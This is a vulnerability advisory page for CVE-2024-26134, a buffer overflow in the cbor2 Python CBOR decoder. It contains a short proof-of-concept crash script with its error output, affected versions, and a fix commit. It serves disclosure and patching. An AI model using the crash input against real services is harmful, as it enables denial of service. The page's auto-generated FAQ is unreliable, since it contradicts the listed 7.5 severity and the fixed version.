high
7.5
CWE
120 119
EPSS
0.045%
Advisory Published
Advisory Published
Updated

CVE-2024-26134: CBOR2 decoder has potential buffer overflow

First published: Mon Feb 19 2024(Updated: )

### Summary Ever since https://github.com/agronholm/cbor2/pull/204 (or specifically https://github.com/agronholm/cbor2/commit/387755eacf0be35591a478d3c67fe10618a6d542) was merged, I can create a reproducible crash when running the snippet under PoC on a current Debian bullseye aarm64 on a Raspberry Pi 3 (I was **not** able to reproduce this on my x86_64 Laptop with Python 3.11; I suspect because there is enough memory to allocate still) ## Details ### PoC ```py import json import concurrent.futures import cbor2 def test(): obj = "x" * 131128 cbor_enc = cbor2.dumps(obj) return cbor2.loads(cbor_enc) with concurrent.futures.ProcessPoolExecutor() as executor: future = executor.submit(test) print(future.result()) ``` ``` malloc(): unsorted double linked list corrupted Traceback (most recent call last): File "test.py", line 14, in <module> print(future.result()) File "/usr/lib/python3.9/concurrent/futures/_base.py", line 440, in result return self.__get_result() File "/usr/lib/python3.9/concurrent/futures/_base.py", line 389, in __get_result raise self._exception concurrent.futures.process.BrokenProcessPool: A process in the process pool was terminated abruptly while the future was running or pending. ``` If one calls it without the indirection via the pool executor, a SystemError is shown that hides the buffer overflow. ```py import json import cbor2 def test(): obj = "x" * 131128 cbor_enc = cbor2.dumps(obj) return cbor2.loads(cbor_enc) print(test()) ``` ``` Traceback (most recent call last): File "test.py", line 12, in <module> print(test()) File "test.py", line 9, in test return cbor2.loads(cbor_enc) SystemError: <built-in function loads> returned NULL without setting an error ``` ### Impact An attacker can crash a service using cbor2 to parse a CBOR binary by sending a long enough object.

Credit: security-advisories@github.com security-advisories@github.com

Affected SoftwareAffected VersionHow to fix
pip/cbor2>=5.5.1<5.6.2
5.6.2
agronholm CBOR2 Python>=5.5.1<5.6.2
Fedora=38
Fedora=39
Fedora=40

Remedy

https://github.com/agronholm/cbor2/commit/4de6991ba29bf2290d7b9d83525eda7d021873df

Never miss a vulnerability like this again

Sign up to SecAlerts for real-time vulnerability data matched to your software, aggregated from hundreds of sources.

Read MoreStart Free Trial

Reference Links

Frequently Asked Questions

  • What is the severity of CVE-2024-26134?

    CVE-2024-26134 has not been explicitly assigned a severity score, but it is known to cause crashes in affected software.

  • How do I fix CVE-2024-26134?

    To fix CVE-2024-26134, upgrade cbor2 to version 5.6.2 or later.

  • Which versions of cbor2 are affected by CVE-2024-26134?

    CVE-2024-26134 affects cbor2 versions between 5.5.1 and 5.6.2, inclusive.

  • What platforms are impacted by CVE-2024-26134?

    CVE-2024-26134 impacts systems running Debian Bullseye aarch64 and various versions of Fedora.

  • Who is the vendor for CVE-2024-26134?

    CVE-2024-26134 is associated with the Agronholm cbor2 library.

Company

Resources

Contact

SecAlerts Pty Ltd.
132 Wickham Terrace
Fortitude Valley,
QLD 4006, Australia
info@secalerts.co
By using SecAlerts services, you agree to our services end-user license agreement. This website is safeguarded by reCAPTCHA and governed by the Google Privacy Policy and Terms of Service. All names, logos, and brands of products are owned by their respective owners, and any usage of these names, logos, and brands for identification purposes only does not imply endorsement. If you possess any content that requires removal, please get in touch with us.
© 2025 SecAlerts Pty Ltd.
ABN: 70 645 966 203, ACN: 645 966 203